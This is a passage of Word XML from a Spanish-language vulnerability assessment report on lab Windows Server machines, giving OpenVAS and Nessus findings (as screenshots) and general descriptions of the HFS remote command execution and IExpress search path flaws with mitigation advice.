          <w:p w14:paraId="7E04A433" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>La vulnerabilidad "HTTP File Server Remote Command Execution" se refiere a una vulnerabilidad que permite a un atacante ejecutar comandos de forma remota en un servidor que ejecuta HTTP File Server (HFS).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131C39EE" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CE72D9D" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>HTTP File Server es un software que permite compartir archivos a través de la web utilizando el protocolo HTTP. La vulnerabilidad se produce porque el software no valida adecuadamente las entradas de usuario en el parámetro "filename" de una solicitud GET.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCDA4D3" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B38DC63" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Un atacante puede aprovechar esta vulnerabilidad para enviar una solicitud GET maliciosa con un nombre de archivo especialmente diseñado que contenga comandos maliciosos. Si el servidor HFS está configurado incorrectamente, estos comandos se ejecutarán en el servidor sin la necesidad de autenticación.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F6BA278" w14:textId="77777777" w:rsidR="00984073" w:rsidRDefault="00984073" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6249036E" w14:textId="5F44D3FF" w:rsidR="00994D80" w:rsidRDefault="00984073" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Para mitigar esta vulnerabilidad, se recomienda actualizar a la última versión del software HFS, ya que las versiones anteriores a la 2.3m Build 300 son vulnerables. También se recomienda restringir el acceso al servidor HFS solo a usuarios autorizados y configurar el software para que no permita la ejecución de comandos a través de la entrada de usuario en el parámetro "filename". Además, se deben implementar medidas de seguridad adicionales, como firewalls y sistemas de detección de intrusiones, para proteger el servidor contra posibles ataques.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE8E600" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70177C04" w14:textId="23513EE5" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="003146DE">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
            </w:pPr>
            <w:bookmarkStart w:id="23" w:name="_Toc135575980"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Máquina Windows Server DC02 -&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="23"/>
          </w:p>
          <w:p w14:paraId="77C5EDD3" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="003146DE"/>
          <w:p w14:paraId="50CEAF85" w14:textId="3A4149FA" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="003146DE">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
            <w:r>
              <w:t>OpenVas -&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F58D5B" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="003146DE"/>
          <w:p w14:paraId="6DE3C22D" w14:textId="290308B0" w:rsidR="003146DE" w:rsidRDefault="006F4A84" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Encontrando estas vulnerabilidades:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08730EDF" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0389876C" w14:textId="00FC2C8E" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6545E813" wp14:editId="45E50C5A">
                  <wp:extent cx="6645910" cy="3326130"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
                  <wp:docPr id="171924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49570" name=""/>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6645910" cy="3326130"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD6FAAF" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71CC14AD" w14:textId="158A0CF8" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora analizaré la vulnerabilidad de nivel alto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F275B5A" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53272427" w14:textId="3BD322CB" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="272E7CC7" wp14:editId="3D75ACE5">
                  <wp:extent cx="6645910" cy="3326130"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
                  <wp:docPr id="123696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454" name=""/>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6645910" cy="3326130"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="762F02CE" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>La vulnerabilidad de la que estás hablando se conoce como "Windows IExpress Untrusted Search Path Vulnerability". Esta vulnerabilidad se encuentra en la función IExpress de Microsoft Windows, que es una herramienta de compresión de archivos que se utiliza para crear archivos ejecutables de instalación (por ejemplo, archivos .exe) en sistemas operativos Windows.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="048B8569" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7789C843" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>La vulnerabilidad se debe a una ruta de búsqueda no confiable utilizada por la función IExpress al buscar archivos necesarios para la instalación. Un atacante podría aprovechar esta vulnerabilidad para crear un archivo de instalación malicioso que explote esta ruta de búsqueda no confiable para ejecutar código malicioso en el sistema de la víctima.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD4983D" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25E15D90" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Un atacante podría utilizar varios métodos para explotar esta vulnerabilidad, como convencer al usuario para que descargue y ejecute un archivo malicioso o colocar un archivo malicioso en una ubicación de búsqueda no confiable que sea accesible para el sistema afectado.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51CF2B76" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42B2AAFA" w14:textId="13C33905" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Microsoft ha publicado parches de seguridad para abordar esta vulnerabilidad, por lo que se recomienda a los usuarios de Windows que actualicen su sistema operativo con las últimas actualizaciones de seguridad para protegerse contra esta y otras vulnerabilidades conocidas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48953D2A" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Además de aplicar los parches de seguridad proporcionados por Microsoft, hay algunas medidas adicionales que puedes tomar para proteger tu sistema contra la vulnerabilidad de Windows IExpress Untrusted Search Path:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20584F5F" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76E9C48D" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>1. Evita descargar archivos de fuentes no confiables: No descargues o ejecutes archivos de sitios web o remitentes desconocidos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01265BA6" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37969DB0" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>2. Utiliza software antivirus: Instala y mantén actualizado un software antivirus en tu sistema para detectar y bloquear archivos maliciosos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="282C2D20" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41CBEECE" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>3. Configura las opciones de seguridad de Windows: Configura tu sistema operativo para que muestre advertencias o preguntas antes de descargar o ejecutar archivos desconocidos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479527EE" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4029C029" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>4. Utiliza una cuenta de usuario sin privilegios administrativos: Utiliza una cuenta de usuario sin privilegios administrativos para navegar por la web y realizar tareas cotidianas en tu sistema. De esta manera, limitarás los daños que pueden causar los archivos maliciosos que pudieran ejecutarse.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CBDB18C" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34511ABB" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>5. Mantén actualizado tu sistema operativo: Mantén actualizado tu sistema operativo con las últimas actualizaciones de seguridad y parches de software disponibles para proteger tu sistema contra las vulnerabilidades conocidas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267B4DBA" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6361B195" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>6. Realiza copias de seguridad regularmente: Realiza copias de seguridad de tus archivos importantes regularmente para asegurarte de que puedas recuperarlos en caso de un ataque cibernético o un fallo del sistema.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E6993D" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F238C11" w14:textId="6A919984" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Siguiendo estas prácticas recomendadas, podrás reducir el riesgo de que tu sistema sea afectado por la vulnerabilidad de Windows IExpress Untrusted Search Path o cualquier otra vulnerabilidad conocida.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2295F45D" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53FB82CD" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E8D706E" w14:textId="77777777" w:rsidR="008E3920" w:rsidRDefault="008E3920" w:rsidP="008E3920">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18F3E7BC" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13C742A9" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E00DD54" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31D3E6F1" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B444FEC" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FD0AC98" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BD6DB5C" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="660400C8" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6348B4EF" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25AF9767" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="043F06B2" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25C3A12F" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="187EADC5" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1503BF66" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63A7338C" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="006F4A84">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BE3E2B5" w14:textId="3CA03418" w:rsidR="006F4A84" w:rsidRDefault="00B40465" w:rsidP="00B40465">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Nessus -&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A3F7674" w14:textId="77777777" w:rsidR="00B40465" w:rsidRDefault="00B40465" w:rsidP="00B40465"/>
          <w:p w14:paraId="0F7AFCDF" w14:textId="3FF12ECF" w:rsidR="008D6D7B" w:rsidRDefault="008D6D7B" w:rsidP="00B40465">
            <w:r>
              <w:t xml:space="preserve">Encontramos </w:t>
            </w:r>
            <w:r w:rsidR="00386103">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> vulnerabilidad crítica 4 altas y </w:t>
            </w:r>
            <w:r w:rsidR="00386103">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> medias:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BBA302" w14:textId="77777777" w:rsidR="00B40465" w:rsidRPr="00B40465" w:rsidRDefault="00B40465" w:rsidP="00B40465"/>
          <w:p w14:paraId="7624371B" w14:textId="0AA1B9DA" w:rsidR="006F4A84" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79638535" wp14:editId="79FA381D">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1143664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4170" name=""/>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7D8A0D02" w14:textId="77777777" w:rsidR="006F4A84" w:rsidRDefault="006F4A84" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="599E89F8" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08E22533" w14:textId="72FF4EE1" w:rsidR="003146DE" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Encontrando esta vulnerabilidad de nivel crítico que trata de los parches faltantes:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DFCB894" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="762B356D" w14:textId="1D5CF5FC" w:rsidR="003146DE" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12559074" wp14:editId="779365B0">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1011866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6658" name=""/>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09901C03" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E39CC85" w14:textId="76440348" w:rsidR="003146DE" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Estas de nivel alto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C615DC" w14:textId="77777777" w:rsidR="008D6D7B" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="419497BF" w14:textId="0E426822" w:rsidR="008D6D7B" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A19D6C" wp14:editId="6720ED22">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1479765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65992" name=""/>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5A48A10A" w14:textId="77777777" w:rsidR="008D6D7B" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DA61FCC" w14:textId="15AC14B4" w:rsidR="008D6D7B" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y est</w:t>
            </w:r>
            <w:r w:rsidR="00AD44CC">
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:t>s de nivel medio:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="006945EA" w14:textId="77777777" w:rsidR="008D6D7B" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1566A78A" w14:textId="0B03B0A6" w:rsidR="008D6D7B" w:rsidRDefault="008D6D7B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279C90BF" wp14:editId="3C69AAF5">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1334383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3742" name=""/>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7DABAF95" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39E828A3" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05305FBB" w14:textId="1E86ECE4" w:rsidR="005A365B" w:rsidRDefault="005A365B" w:rsidP="005A365B">
            <w:pPr>
              <w:pStyle w:val="Ttulo3"/>
            </w:pPr>
            <w:bookmarkStart w:id="24" w:name="_Toc135575981"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Máquina Windows Server  -&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="24"/>
          </w:p>
          <w:p w14:paraId="33AE4C5F" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FE5CFF5" w14:textId="41DC274C" w:rsidR="003146DE" w:rsidRDefault="005A365B" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Está máquina tiene la IP 192.168.1.79.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="539964B0" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F092B88" w14:textId="7A36CE1E" w:rsidR="003146DE" w:rsidRDefault="005A365B" w:rsidP="003223A6">
            <w:pPr>
              <w:pStyle w:val="Ttulo4"/>
            </w:pPr>
            <w:r>
              <w:t>Nessus -&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="189825B5" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="307F442E" w14:textId="5DE88945" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Estas son las vulnerabilidades encontradas en esta máquina controlador de dominio.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="055D40F9" w14:textId="77777777" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DA06A1D" w14:textId="397BC05E" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Crítico:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007DF4E3" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="543F9689" w14:textId="320217D2" w:rsidR="003146DE" w:rsidRDefault="003223A6" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15589095" wp14:editId="01AF6DF0">
                  <wp:extent cx="6645910" cy="3347085"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="2010815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15488" name=""/>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5669A2FC" w14:textId="77777777" w:rsidR="003146DE" w:rsidRDefault="003146DE" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="347655B5" w14:textId="34C80C83" w:rsidR="003146DE" w:rsidRDefault="003223A6" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Alto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D55F16D" w14:textId="77777777" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00984073">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55CDD2B3" w14:textId="77777777" w:rsidR="003223A6" w:rsidRDefault="003223A6" w:rsidP="00984073">
